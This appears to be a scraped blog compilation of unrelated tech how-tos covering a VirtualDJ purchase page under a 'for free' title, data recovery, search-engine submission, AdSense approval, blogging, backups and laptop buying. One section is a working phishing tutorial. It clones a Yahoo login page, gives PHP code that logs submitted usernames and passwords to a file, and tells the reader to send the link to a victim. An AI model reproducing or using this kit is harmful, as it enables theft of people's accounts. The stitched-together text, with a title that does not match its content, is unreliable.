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How to Get Virtual DJ Pro Full For Free

Buy VirtualDJ Pro Full
and join the virtualdj familly

Buying VirtualDJ Pro Full is very easy, fast and secure.

If you buy using a credit card, you will be able to download your new software instantly over the Internet.
You could be ready and running in less than 5 minutes.
(You can also choose to pay using phone, fax, check, wire, paypal, ...)

Being part of the VirtualDJ familly, you will also get access to all the great plugins, skins, addons, etc available on this website.

Electronic Delivery

If you choose Electronic Delivery, you are entitled to a 10% discount.

Price:      $329      (277.90 €)
Discount:      - $30      (25.34 €)
Total:      $299      (252.56 €)

Buy Now

Postal Delivery

Choose Postal Delivery to receive a physical box.
(you will still be able to download any new version instantly from this website)

Price: $329 (277.90 €)

Buy Now

Upgrade to VirtualDJ Pro Full
if you already own an Atomix Productions' software

Upgrade to VirtualDJ Pro Full, prices starting at $49 (41.39 €) *
If you own another product sold by Atomix Productions or one of its partners, you can upgrade to VirtualDJ Pro Full at a discounted price;
(for example, products that qualify for upgrade pricing include VirtualDJ Pro Basic, VirutalDJ HomeEdition 5, VirtualDJ Limited Edition (LE), Numark Cue or VirtualVinyl, etc...)

You will then be a full member of the VirtualDJ Community, and enjoy all the advantages of VirtualDJ Pro Full.
You will get the latest versions before everybody else, and benefit from the most advanced features and the broadest range of compatibility

or reach me through my contact info.

how to recover files you mistaken delected or from formatted partition

How do I recover files from formatted hard drives

What is format?

To prepare a storage medium, usually a disk, for reading and writing. When you format a disk, the operating system erases all bookkeeping information on the disk, tests the disk to make sure all sectors are reliable, marks bad sectors (that is, those that are scratched), and creates internal address tables that it later uses to locate information. You must format a disk before you can use it.

Note that reformatting a disk does not erase the data on the disk, only the address tables. Do not panic, therefore, if you accidentally reformat a disk that has useful data. A computer specialist should be able to recover most, if not all, of the information on the disk. You can also buy programs that enable you to recover a disk yourself.

The previous discussion, however, applies only to high-level formats, the type of formats that most users execute. In addition, hard disks have a low-level format, which sets certain properties of the disk such as the interleave factor. The low-level format also determines what type of disk controller can access the disk (e.g., RLL or MFM).

Almost all hard disks that you purchase have already had a low-level format. It is not necessary, therefore, to perform a low-level format yourself unless you want to change the interleave factor or make the disk accessible by a different type of disk controller. Performing a low-level format erases all data on the disk.


The Format commands are typically run to prepare a new logical drives for use after Fdisked hard drive - enabling the installation of an operating system, application programs & eventual user data. The format command has been around for a long time, formerly they were stand alone DOS programs before being integrated into Windows.

To recover data from a drive containing lost or missing partition, follow these steps:

First We recommend that you use professional partition recovery tool - Partition Table Doctor to recover missing or lost partitions.


Where previously the computer would boot and be usable, systems that have been Formatted often report the following errors: (these errors are frequently displayed on a black screen with white text.)
  • Operating System not found
  • Invalid or corrupt FAT
  • Cannot find file or program
  • Invalid command.com
  • Primary/Secondary Hard disk failure
  • Non system disk
  • isk error
Or when a partition has been formatted, the all data would disappear.

To recover files from formatted drives, please follow this procedure:

1. Click the Select "FormatRecovery" button on the main window of Data Recovery Wizard.

2.The first screen on the "FormatRecovery" tool will display a list of partitions found on the drives found in your system. If your partition is not listed, this is a sign of more severe corruption. You may need to select the "AdvancedRecovery" tool to recover your data. If you are trying to recover data from removable media, you need to have the media in the drive before selecting the "FormatRecovery " tool.

3. When you accidentally reformatted a partition you may have changed the partition type. The "Previous File System" radio box will allow you to select the previous file system type for your partition.

4. To begin a formatted recovery, select a partition and click "Next" to begin scanning for Files. Data Recovery Wizard analyses the drive data structures and file system attributes and displays the directory tree.

5.After this scanning is finished, you'll see file/folder tree.

6. Select the file or directory that you want to recover and press the "Next" button.

7.Select a directory and press the "Next" button to save the data.

Note: If you have repartitioned your drive and the partition size has been changed or moved, use the "AdvancedRecovery" tool.

Caution: Saving file(s) to the partition or drive from where you are recovering data, for it may result in overwriting of data, and would result in permanent data loss!!!

how to create a phisher site

using it on people is illegal.

1. First open the website in a browser for which you want to create a phishing page . Now right click  in an empty space and select view source , copy all the contents to a note pad and save it as something.html 

example :

2. Now open Yahoo.html (something.html) in a notepad .Now search for the string 
"action = https.." and change the address to login.php and change method = " Post" to "GET" Finally save it 

3. Now we have to create login.php .For this open notepad , copy/paste the following code in it and save it as login.php

header ('Location: http://yahoo.com');
$handle = fopen("log.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
fwrite($handle, "\r\n");

Note :- By default the victim will be redirected to yahoo.com once he clicks login ,If you want you can change the address, you can do it  by changing the www.yahoo.com to any  address you desire

4.Now create an account in Free web hosting sites, which supports php like , T35.com or 000webhost.com 

5. Now upload all the two files which we created Yahoo.html , login.php  

6. Now send the  Yahoo.html link to the victim , once  he enters the information and logins in , He will be redirected to the website which we did in step three

7. Now to see the victims password login to your hosting account, there you 'll see new  file log.txt , open it to see the victims user-id and password  

Hope you enjoyed this tutorial ,If you have any doubts please feel free to post a comment .

how to submit your website to search engines

Submit your URL/Website to google and other search engines

This tutorial is for educational purpose only.

Do you want to add your site to all popular search engines?
Do you want to see your site in google searches with best position?
Do you want to get more traffic to your site?
Then you are at the right place.

How to submit your site to Google:

First visit this url http://www.google.com/addurl/?continue=/addurl
Now, type your website url in the given field and fill the captcha code carefully and hit enter or submit.
Congrats, your site has been submitted to google for crawling, now after some time, google crawler, generally known as spider, will crawl your website and display in google searches.

Please note: This may take some time, may be from 1 day to 1 week, as we know, how busy google really is.

How to submit your site to all search engines at once:

First visit this url http://www.addme.com,
Now, enter your website url in the given field and continue and it will ask you some more things, like about your site, search keywords, etc just fill them carefully,(Keywords will directly affect your site listing and search ranks, please be careful and choose good keywords),
Now, all done, your site has been submitted and will be crawled by all major and popular search engines.

Please note: Crawling time of each search engine is differnet, so one may take 1 day while other may take 1 month, so please wait and you will get approx 15 mails from addme, just read everyone and you have to click on a link or follow some simple steps to complete your submissions.

Use a valid and working email address!

Things to Do Before Applying for Google Adsense

I know many of you want to make some good money with adsense right?

But it’s not easy to get into adsense program now a days. You have to do few things before applying for adsense.

Google Adsense is world’s larges Ads Network and works at Pay Per Click system. It’s paying rates are better than all of other networks which is the biggest reason it is so popular to all Bloggers and Webmasters. But since everybody is running behind them, they have made the approval system very strict. You make little mistakes and get disapproved every time. So you need a complete guidance and list of thing that you need to do before applying for Google Adsense and supposing that you are ready.

12 Things to Do Before Applying for Google Adsense

1. Privacy Policy :

One of the common mistakes that every Blogger makes and that I made many times before finally getting approved. Even though there are people out there who say that having a Privacy Policy for a Blog doesn’t makes sense but they are wrong.

A Privacy actually describes to your readers about what they will get on your Blog , what they should do and what they should not. So obviously there is nothing bad in having a Privacy Policy. While it can affect somehow on your Adsense Approval, you must give it a try. You can write it yourself or find Privacy Policy Generators online (You don’t need a lawyer anyway).

2. About Page

An About has major role and importance if you don’t want to apply for Adsense. But when it comes to Adsense, they are about Zero chances of getting approved if you are not showing this page.About page simply describes about you and your Blog . This will not only help you establish a relationship with readers but it will also make them trust upon you.

3. Contact Us Page

It’s quite obvious that everyone has his/her own opinion. What one of your readers likes may be bothering someone else. Than it is better to give them opportunity to speak up to you and tell how they feel about your Blog, what they want to be edited , what they liked or hated.

It will also show the Google Adsense Team that is viewing your site that you actually care about your readers and not only the money and Adsense.

4. Name/ Email Verification

Make sure to put you Name and Email address in some easily visible area like About Me and Contact Us pages. It will confirm to Google Adsense Team that it is the same person who applied for Adsense and not some spam, crappy bots.

5. Age Verification

I’m really laughing out typing this.


Because this is where I encountered a problem. Instead of 18, I accidentally published my age as 17 while on Adsense Application Form, it was accurately 18.

Hence there started a problem . Because Google Adsense is not for under 18 people. I realized this problem after being disproved a few times without any legitimate reason. So I advice you to be accurate while typing your age.

6. Minimum Number of Posts

There is no exact answer. Not even one. Because I have seen very established Blogs with 400+ posts and their owner telling me that Google Adsense is rejecting them while somewhere ,people with 40,50 posts are enjoying making money. Exactly what I said that there is no actual answer. However, we can always predict things. According to my experience , you should only apply after you have more than 70 posts. Posts length should must be 500+ words too.

Read : Difference Between Short Length Post Vs Length Posts – What’s Best?

7. Design

Your Blog is the biggest thing after Content. This represents your expertise ,experience and Professionalism. So be careful because anything can kill your Chances.

8. Content Type

Be careful with what type of content you are publishing. Because it is something that truly matters. Google Adsense is not for Pornographic, Illegal Items, Drugs or other Blogs / Sites like that. Also Adsense team won’t be willing to allow you to step in if you own a Non English Blog. Having posts shorter than 300 words in length is also Red Signal.

9. Providing Value

Don’t complain about not making money and don’t clearly state that your are Blogging for Money only and have no other interest in it. Because this will show them that you will not be providing values to your readers any day. Hence another Red Light glows up.

10. Top Level Domain

Those are gone far away when Adsense used to approve “Blogspot” and “WordPress.com” Blogs. As for today, you must have your own unique domain that specifies your Blog. If you don’t have one yet, stop dreaming about getting approved with Sub domains and go buy a Top Level Domain.

Another important thing about domain is it’s age. Because for most of Asian Countries, Adsense has placed an age restriction. They don’t accept any sites before they are 6 months old.

11. Other Ad Networks

If you have any other Ads placed like Chitika, Clicksor or anything, it’s time to drop them off.

Even Google Adsense allows you to use other Ad Networks along with them, it’s better to remove the ads before Applying and don’t put them back until you get a reply from Adsense Team.

12. Paid Traffic

Google hates the sites that are getting Paid traffic and mostly penalizes them so there is not a damn chance of getting Adsense Approval letter for a site that is getting paid traffic. You can bring traffic from Search Engines or any other way you want but if you want to earn via Google Adsense the right way, paid traffic is not a solution.

What to do if adsense is not getting approved?

If google adsense still not approving your website/blog. You can use these websites to earn money without adsense.

Text Link Ads
Final Words About Apply for Adsense!

This will take your few time and you have to Do these things Before Applying for Google Adsense. I guess these are not too hard. Don’t be sad if google adsense not approve your blog!

How to Become a Professional Blogger

A blog, which combines the words "web" and "log," is a public online forum in which one or more bloggers (writers) maintains a regular schedule of writings designed to bring visitors to the blog. It's possible to make a living as a professional blogger by attracting enough visitors to the and generating income, typically through visitors' clicking on advertisements. The key to becoming a blogger on a professional level is the ability to write and entertain, as well as maintain as many blogs as you can manage.

Write down several ideas for topics that you feel might attract visitors. There's no right or wrong subject to cover on a blog, but certain topics are more popular than others. This can vary all the time, so it is important to be aware of the blogs that seem most successful. A blog that gets no visitors will not generate any income. Select a subject you'll enjoy writing about regularly. Just talking about yourself day after day is not likely to make your blog professional, unless you can put an entertaining spin on your presentation. Sports, music, how to earn money from home and health are examples of subjects you can cover.

Sign up for a blog account. There are a lot of blog hosting websites to choose from (see Resources). These services offer built-in tools to let you compose your blog, upload images and subscribe to RSS feeds. The RSS feeds are necessary because these are like news feeds. They notify people of your new blog posts and can bring in visitors.

Sign up for a "pay-per-click" account by visiting a site such as Google Adsense (see Resources). This is the primary source of income for bloggers. The service places random ads on your blog as closely related to your blog's subject matter as possible. These systems are easy to set up and generate income for you each time your visitors click on the ads (particularly if a purchase results from a click that originates from your blog). The pay-per-click service calculates your generated income and sends you money your blog has earned.

Write your blog. Blogs are typically entries in reverse chronological order, with previous months' posts archived for visitors to read if they desire. Your blog should include news and commentary related to the subject of your blog. Personal views are welcome. Inject your personality into your posts to develop a following. Give visitors a reason to come to your blog for the information rather than a similar blog.

Respond to posts your visitors leave on your blog. A good blog is interactive. You won't be able to respond to every post, but engage as many of the posters on your blog as you can. The more interaction you generate, the more active your blog will be.

Easy Steps to Backup Your Computer to a Hard drive

How to Back up Files With Windows XP on an External Hard Drive  


Computer running Windows XP
External hard drive


Step 1
Open the Backup Utility on your computer by pressing the "Start" button, clicking on "All Programs," selecting "Accessories," clicking "System Tools" and clicking "Backup."

Step 2
Click the "Next" button and then select what type of backup you want to make. If you wish to back up all of the files on the computer (the recommended operation), select "All information on this computer" and then click the "Next" button.

Step 3
Click the "Browse" button and then select your external hard drive. Click the "OK" button and then click the "Next" button.

Step 4
Click on the "Finish" button to initiate the backup process



When Buying a Laptop,it takes a lot's Of time for Choose a Best One Laptop
for us.There are many Laptops are available in market that consider the
lot's of features.All the Laptops are Having the Different Features.So,
we are Confused for choose best one Laptop.

Here are the most important factors that one has to consider before buying
a new laptop.

Things Before Buying Perfect Laptop

1 > Battery Life :-

The Battery Life is Most Important things for those who are work with
their Laptop while outside frequently.There are 6-cell batteries and
9-cell batteries.9-cells provide stand-alone power than 6-cell batteries.

2 > Operating System :-

The Operating System is also important things for use better work.
All The Laptops are Having the new market operating System like
Windows 7 and Windows 8.If you buy a Apple Laptop than that Come
with their Operating System Mac OS.

3 > RAM(Memory) :-

RAM is also important factor that use for the speed up your computer.
The RAM is high that computer having the more speed.The 2GB or 4 GB
RAM is enough for Laptops.

4 > Processor :-

Now The Processors are come with high speed.The i Serious Processor
by Intel is more used processor like i3,i5 and i7.

5 > Screen Size :-

The Screen Size is also consider before buying a Laptop.You may think that a 17-inch widescreen display is just what you need. Ultimately, that may prove to be too big.the 14-inch and 15.6-inch Laptops are also available.

6 > Bluetooth,Camera and Wireless :-

Buy a Laptop that consider the features of Bluetooth,camera and wireless.

7 > Keyboard and Touch Pad :-

Check the type of keyboard and the layout. Normal layout is the US layout of keyboards. If it is a 15 inch screen laptop, You will have Numeric Keypad. Sizes lesser than 15 inch will not have it. Some keyboards come with back-lit LED lights for Easy typing in dark.Touch Pad is common for all laptops.

8 > Ports :-

Check out all the ports for USB, Speakers,Network, HDMI and others. Laptops starts coming with USB 3.0 port for faster data transfer. e-SATA ports are also available. It can be used as a USB port. It is mainly to transfer with external hard disk drives.

How to buy new Laptop

9 > Design :-

Choose a better Design and Color for your Laptop.Now a days Laptops are
available in many design and color.

10 > Graphics Property :-

The Graphics property is also most important factor.you can also add
1 graphics card in your laptop.If you are Gamer,Designer or Heavy user
than you need more Graphics.

11 > Budget and Price :-
Choose a laptop that Price having in your budget.now a days laptops
are coming with low price with a suitable features.Choose a Laptop that
perfectly use for your work.

So,Here I Consider 11 Things that are help you to find a Best One Laptop
for your use.